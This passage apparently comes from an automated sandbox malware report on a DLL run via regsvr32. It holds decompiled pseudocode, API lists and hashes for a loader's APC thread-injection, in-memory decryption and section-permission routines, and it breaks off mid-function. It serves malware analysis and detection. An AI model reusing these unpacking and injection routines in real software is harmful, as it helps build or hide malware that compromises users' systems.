                                                                                                                                                                    • Part of subcall function 67CD13D1: SetLastError.KERNEL32(00000000), ref: 67CD1422
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(67CD4188), ref: 67CD1E38
                                                                                                                                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 67CD1E52
                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 67CD1E6E
                                                                                                                                                                  • HeapDestroy.KERNEL32 ref: 67CD1E7A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2110400756-0
                                                                                                                                                                  • Opcode ID: 54c056cb51e3429d6fcb0a97a4c28e9bd6cef6f1be6e50581efa53fe636daf6e
                                                                                                                                                                  • Instruction ID: 29c9d5cbf6702928ebc4afe665454702b77f6fb44de0fbdd3af45ff041878af2
                                                                                                                                                                  • Opcode Fuzzy Hash: 54c056cb51e3429d6fcb0a97a4c28e9bd6cef6f1be6e50581efa53fe636daf6e
                                                                                                                                                                  • Instruction Fuzzy Hash: 58217275600205FBDB009FADCCC9A4ABBB9FB5E764B224129FB55D3540F7389A00CB68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD13D1, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E67CD13D1(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x67cd41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                                                                                                                                  0x67cd13e8
                                                                                                                                                                  0x67cd13ee
                                                                                                                                                                  0x67cd13f2
                                                                                                                                                                  0x67cd13fd
                                                                                                                                                                  0x67cd1405
                                                                                                                                                                  0x67cd140e
                                                                                                                                                                  0x67cd1412
                                                                                                                                                                  0x67cd1419
                                                                                                                                                                  0x67cd1420
                                                                                                                                                                  0x67cd1422
                                                                                                                                                                  0x67cd1428
                                                                                                                                                                  0x67cd1405
                                                                                                                                                                  0x67cd142c

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateThread.KERNELBASE ref: 67CD13E8
                                                                                                                                                                  • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 67CD13FD
                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 67CD1408
                                                                                                                                                                  • TerminateThread.KERNEL32(00000000,00000000), ref: 67CD1412
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 67CD1419
                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 67CD1422
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3832013932-0
                                                                                                                                                                  • Opcode ID: df27e56b54e35759147152a9266f096ef321604a721b19c1512151b81ba44779
                                                                                                                                                                  • Instruction ID: 88034a36f28b7adb32d5dd98446e458d3db652bce2e7d975cf7394aba728b42b
                                                                                                                                                                  • Opcode Fuzzy Hash: df27e56b54e35759147152a9266f096ef321604a721b19c1512151b81ba44779
                                                                                                                                                                  • Instruction Fuzzy Hash: 70F01536205621FBDB225BB48C4EF9FBF79FB0E751F058414FA0991150E729A810DBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D4EB60, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 147 67d4eb60-67d4eba0 FindFirstChangeNotificationA 148 67d4eba2-67d4ebb6 147->148 149 67d4ebbb-67d4ebf8 call 67d4ee40 GetCurrentDirectoryA 147->149 148->149 152 67d4ec10-67d4ec24 149->152 153 67d4ebfa-67d4ec0e 149->153 154 67d4ec2a-67d4ec3b 152->154 153->154 155 67d4ec40-67d4ec4a 154->155 156 67d4ec52-67d4ec6c 155->156 157 67d4ec4c-67d4ec50 155->157 158 67d4ec74-67d4ec7c 156->158 159 67d4ec6e-67d4ec72 156->159 157->156 157->158 158->155 160 67d4ec7e-67d4eca1 call 67d4ef10 158->160 159->158 159->160 163 67d4eca6-67d4eca8 160->163 164 67d4ecbc-67d4ecc4 163->164 165 67d4ecaa-67d4ecba 163->165 164->163 166 67d4ecc6-67d4ed5b GetEnvironmentVariableA call 67d4ef10 * 2 164->166 165->164 165->166 171 67d4ed6d-67d4ed77 166->171 172 67d4ed5d-67d4ed64 166->172 174 67d4ed7b-67d4ed93 call 67d4ee40 171->174 172->171 173 67d4ed66-67d4ed6b 172->173 173->174 177 67d4ed98-67d4ed9a 174->177 178 67d4eda0-67d4edab 177->178 179 67d4ed9c-67d4ed9e 177->179 180 67d4edad-67d4edb5 178->180 181 67d4edb7-67d4edd3 178->181 179->178 179->180 180->177 180->181 182 67d4edd5-67d4ede5 181->182 183 67d4ede7 181->183 184 67d4edeb-67d4edf2 182->184 183->184 185 67d4edf4 184->185 186 67d4ee18 call 67d4f1f0 184->186 187 67d4edf6-67d4edfc 185->187 188 67d4edfe-67d4ee13 185->188 190 67d4ee1d-67d4ee37 186->190 187->186 187->188 188->186
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstChangeNotificationA.KERNEL32 ref: 67D4EB7D
                                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000404,67DB9BC0), ref: 67D4EBDF
                                                                                                                                                                  • GetEnvironmentVariableA.KERNELBASE(67CD8140,67DBA1E8,00000404), ref: 67D4ECD9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChangeCurrentDirectoryEnvironmentFindFirstNotificationVariable
                                                                                                                                                                  • String ID: 3
                                                                                                                                                                  • API String ID: 2016254915-1842515611
                                                                                                                                                                  • Opcode ID: 4cac532767ed15912f274acf8a367432b5fd1eb72152982208fd09648001ec07
                                                                                                                                                                  • Instruction ID: 6cce265044d661f800366e98adb6e7243a1b943a9a3effd80605ae1fe85bf7e8
                                                                                                                                                                  • Opcode Fuzzy Hash: 4cac532767ed15912f274acf8a367432b5fd1eb72152982208fd09648001ec07
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F71C2B1A06302DFEF14CF28C88561DB7A1BB9A328F488E2ED456D7344D33898898F55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD18AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111memoryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 373 67cd18ad-67cd18ce call 67cd1000 376 67cd19f4-67cd19f9 373->376 377 67cd18d4-67cd1910 VirtualAlloc 373->377 378 67cd19ec 377->378 379 67cd1916-67cd191a 377->379 380 67cd19f3 378->380 381 67cd1920-67cd1933 379->381 382 67cd19b2 379->382 380->376 384 67cd1936-67cd1955 381->384 383 67cd19b8-67cd19be 382->383 385 67cd19c0-67cd19d1 memcpy 383->385 386 67cd19d3 383->386 387 67cd1957-67cd195e 384->387 388 67cd1992-67cd19ad 384->388 391 67cd19da-67cd19ea VirtualFree 385->391 386->391 389 67cd1965-67cd1970 387->389 388->384 390 67cd19af-67cd19b0 388->390 392 67cd1986 389->392 393 67cd1972-67cd1984 389->393 390->383 391->380 394 67cd198d-67cd1990 392->394 393->394 394->388 394->389
                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E67CD18AD(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x67cd41b0;
				_t50 = E67CD1000(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x67cd41cc;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x67cd5137; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x67cd41cc = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}






























                                                                                                                                                                  0x67cd18b4
                                                                                                                                                                  0x67cd18c4
                                                                                                                                                                  0x67cd18cb
                                                                                                                                                                  0x67cd18ce
                                                                                                                                                                  0x67cd18e3
                                                                                                                                                                  0x67cd18ea
                                                                                                                                                                  0x67cd18ef
                                                                                                                                                                  0x67cd1900
                                                                                                                                                                  0x67cd1903
                                                                                                                                                                  0x67cd1909
                                                                                                                                                                  0x67cd190d
                                                                                                                                                                  0x67cd1910
                                                                                                                                                                  0x67cd19ec
                                                                                                                                                                  0x67cd1916
                                                                                                                                                                  0x67cd1916
                                                                                                                                                                  0x67cd191a
                                                                                                                                                                  0x67cd19b2
                                                                                                                                                                  0x67cd1920
                                                                                                                                                                  0x67cd1921
                                                                                                                                                                  0x67cd1926
                                                                                                                                                                  0x67cd1929
                                                                                                                                                                  0x67cd192c
                                                                                                                                                                  0x67cd192c
                                                                                                                                                                  0x67cd1933
                                                                                                                                                                  0x67cd1936
                                                                                                                                                                  0x67cd193e
                                                                                                                                                                  0x67cd193f
                                                                                                                                                                  0x67cd1940
                                                                                                                                                                  0x67cd1947
                                                                                                                                                                  0x67cd194b
                                                                                                                                                                  0x67cd1951
                                                                                                                                                                  0x67cd1955
                                                                                                                                                                  0x67cd1957
                                                                                                                                                                  0x67cd195b
                                                                                                                                                                  0x67cd195e
                                                                                                                                                                  0x67cd1965
                                                                                                                                                                  0x67cd1968
                                                                                                                                                                  0x67cd196d
                                                                                                                                                                  0x67cd1970
                                                                                                                                                                  0x67cd1986
                                                                                                                                                                  0x67cd1972
                                                                                                                                                                  0x67cd197c
                                                                                                                                                                  0x67cd197e
                                                                                                                                                                  0x67cd1981
                                                                                                                                                                  0x67cd1981
                                                                                                                                                                  0x67cd198d
                                                                                                                                                                  0x67cd198d
                                                                                                                                                                  0x67cd198d
                                                                                                                                                                  0x67cd1965
                                                                                                                                                                  0x67cd1998
                                                                                                                                                                  0x67cd199b
                                                                                                                                                                  0x67cd199e
                                                                                                                                                                  0x67cd19a7
                                                                                                                                                                  0x67cd19a7
                                                                                                                                                                  0x67cd19af
                                                                                                                                                                  0x67cd19be
                                                                                                                                                                  0x67cd19d3
                                                                                                                                                                  0x67cd19c0
                                                                                                                                                                  0x67cd19c9
                                                                                                                                                                  0x67cd19ce
                                                                                                                                                                  0x67cd19e4
                                                                                                                                                                  0x67cd19e4
                                                                                                                                                                  0x67cd19f3
                                                                                                                                                                  0x67cd19f9

                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 67CD1903
                                                                                                                                                                  • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 67CD19C9
                                                                                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 67CD19E4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                  • String ID: Jun 6 2021
                                                                                                                                                                  • API String ID: 4010158826-1013970402
                                                                                                                                                                  • Opcode ID: d37ee69283b0bc120f3640d96a8b9b8a3fb8117aadbdd5177488f2faad12ecd8
                                                                                                                                                                  • Instruction ID: 6ad1bf1874b8ff066663a8559f3835197b6954e61da1f1338849c654b6a7e0e2
                                                                                                                                                                  • Opcode Fuzzy Hash: d37ee69283b0bc120f3640d96a8b9b8a3fb8117aadbdd5177488f2faad12ecd8
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F414C71E0021AAFDF04CF99C881AEEBBB6FF49310F258129DA0477244E775AA45CF94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD20CE, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E67CD20CE(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E67CD1C7D(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                                                                                                                                  0x67cd20d7
                                                                                                                                                                  0x67cd20dc
                                                                                                                                                                  0x67cd20ea
                                                                                                                                                                  0x67cd20ef
                                                                                                                                                                  0x67cd20ef
                                                                                                                                                                  0x67cd20f5
                                                                                                                                                                  0x67cd20fa
                                                                                                                                                                  0x67cd20fe
                                                                                                                                                                  0x67cd2102
                                                                                                                                                                  0x67cd2102
                                                                                                                                                                  0x67cd210c
                                                                                                                                                                  0x67cd2115

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 67CD20D1
                                                                                                                                                                  • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 67CD20DC
                                                                                                                                                                  • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 67CD20EF
                                                                                                                                                                  • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 67CD2102
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1452675757-0
                                                                                                                                                                  • Opcode ID: f7653ffe02f6b6ad367b1eab3aafb07f96c47021235b1a4d825349fdd7aad41b
                                                                                                                                                                  • Instruction ID: be1775ad948a796ae36fde9374231f8e8f563875c13b4c5c5a7e39d58fddbe7f
                                                                                                                                                                  • Opcode Fuzzy Hash: f7653ffe02f6b6ad367b1eab3aafb07f96c47021235b1a4d825349fdd7aad41b
                                                                                                                                                                  • Instruction Fuzzy Hash: B2E092713056116B96116B3D4CC5E6BABACDF96330B120235FB24D21D0EB589C09D5B9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67DA18F0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 208memoryCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 402 67da18f0-67da192a 403 67da192e-67da194e 402->403 404 67da192c-67da1973 call 67d4dc90 402->404 406 67da1978-67da19ba 403->406 404->406 408 67da19bc-67da1a0c 406->408 409 67da1a10-67da1add GetTempPathA VirtualProtect 406->409 408->409 411 67da1adf-67da1b1f 409->411 412 67da1b24-67da1b36 409->412 411->412 413 67da1b38-67da1b7b 412->413 414 67da1b7f-67da1bbf 412->414 413->414 415 67da1c2a 414->415 416 67da1bc1 414->416 415->415 417 67da1bce-67da1c25 416->417 418 67da1bc3-67da1bcc 416->418 417->415 418->415 418->417
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000404,67DA6410,?), ref: 67DA1A78
                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,0000311B,00000040,?), ref: 67DA1ACB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PathProtectTempVirtual
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 3422257996-2766056989
                                                                                                                                                                  • Opcode ID: 358c3bc56757671456a830546c22408d0e0d9fdd1a2505a6073efb6d00e7b4ec
                                                                                                                                                                  • Instruction ID: d506970311b348eafb48da1294f22db4420d9ab5a0a4dbe805d0a64ca9c1442f
                                                                                                                                                                  • Opcode Fuzzy Hash: 358c3bc56757671456a830546c22408d0e0d9fdd1a2505a6073efb6d00e7b4ec
                                                                                                                                                                  • Instruction Fuzzy Hash: 89A13DB0903104DBEB04CF69C482BADBBF1FB8A318F548A5AD126D7395D7385984CB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD126D, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 429 67cd126d-67cd12b0 VirtualProtect 430 67cd1345-67cd134c 429->430 431 67cd12b6-67cd12ba 429->431 431->430 432 67cd12c0-67cd12ca 431->432 433 67cd12cc-67cd12d6 432->433 434 67cd12e8-67cd12f2 432->434 435 67cd12d8-67cd12de 433->435 436 67cd12e0-67cd12e6 433->436 437 67cd12f4-67cd1304 434->437 438 67cd1306 434->438 439 67cd130c-67cd131f VirtualProtect 435->439 436->439 437->438 437->439 438->439 440 67cd132a-67cd133f 439->440 441 67cd1321-67cd1327 GetLastError 439->441 440->430 440->431 441->440
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E67CD126D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x67cd41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}












                                                                                                                                                                  0x67cd1277
                                                                                                                                                                  0x67cd1284
                                                                                                                                                                  0x67cd128a
                                                                                                                                                                  0x67cd1296
                                                                                                                                                                  0x67cd12a6
                                                                                                                                                                  0x67cd12a8
                                                                                                                                                                  0x67cd12b0
                                                                                                                                                                  0x67cd1345
                                                                                                                                                                  0x67cd134c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd12b6
                                                                                                                                                                  0x67cd12b6
                                                                                                                                                                  0x67cd12b6
                                                                                                                                                                  0x67cd12ba
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd12c6
                                                                                                                                                                  0x67cd12ca
                                                                                                                                                                  0x67cd12ee
                                                                                                                                                                  0x67cd12f2
                                                                                                                                                                  0x67cd1306
                                                                                                                                                                  0x67cd1306
                                                                                                                                                                  0x67cd130c
                                                                                                                                                                  0x67cd131b
                                                                                                                                                                  0x67cd131f
                                                                                                                                                                  0x67cd1327
                                                                                                                                                                  0x67cd1327
                                                                                                                                                                  0x67cd132f
                                                                                                                                                                  0x67cd1332
                                                                                                                                                                  0x67cd133f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd133f
                                                                                                                                                                  0x67cd12fa
                                                                                                                                                                  0x67cd12fe
                                                                                                                                                                  0x67cd1304
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1304
                                                                                                                                                                  0x67cd12d2
                                                                                                                                                                  0x67cd12d6
                                                                                                                                                                  0x67cd12e0
                                                                                                                                                                  0x67cd12d8
                                                                                                                                                                  0x67cd12d8
                                                                                                                                                                  0x67cd12d8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd12d6
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 67CD12A6
                                                                                                                                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 67CD131B
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 67CD1321
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1469625949-0
                                                                                                                                                                  • Opcode ID: a85e696e65b20edbc703e7b705442be9cff20fde7622d5ec18b95f6a24f0b6d0
                                                                                                                                                                  • Instruction ID: c1be862ebda3bee0ccdfd269bf8d6b1a2625da5fa3244b8254c3d043013770ac
                                                                                                                                                                  • Opcode Fuzzy Hash: a85e696e65b20edbc703e7b705442be9cff20fde7622d5ec18b95f6a24f0b6d0
                                                                                                                                                                  • Instruction Fuzzy Hash: D521813180020BEFCB14DFA9C881AAAF7F5FF08319F014859D61697584F3B8E694CB94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD14E8, Relevance: 4.6, APIs: 3, Instructions: 60stringthreadCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E67CD14E8() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x67cd41c4);
				_push(1);
				_push( *0x67cd41d0 + 0x67cd5089);
				 *0x67cd41c0 = 0xc;
				 *0x67cd41c8 = 0; // executed
				L67CD1DA8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E67CD1697( &_v44,  &_v28,  *0x67cd41cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x67cd41b8);
				_t7 = _t24 + 2; // 0x2
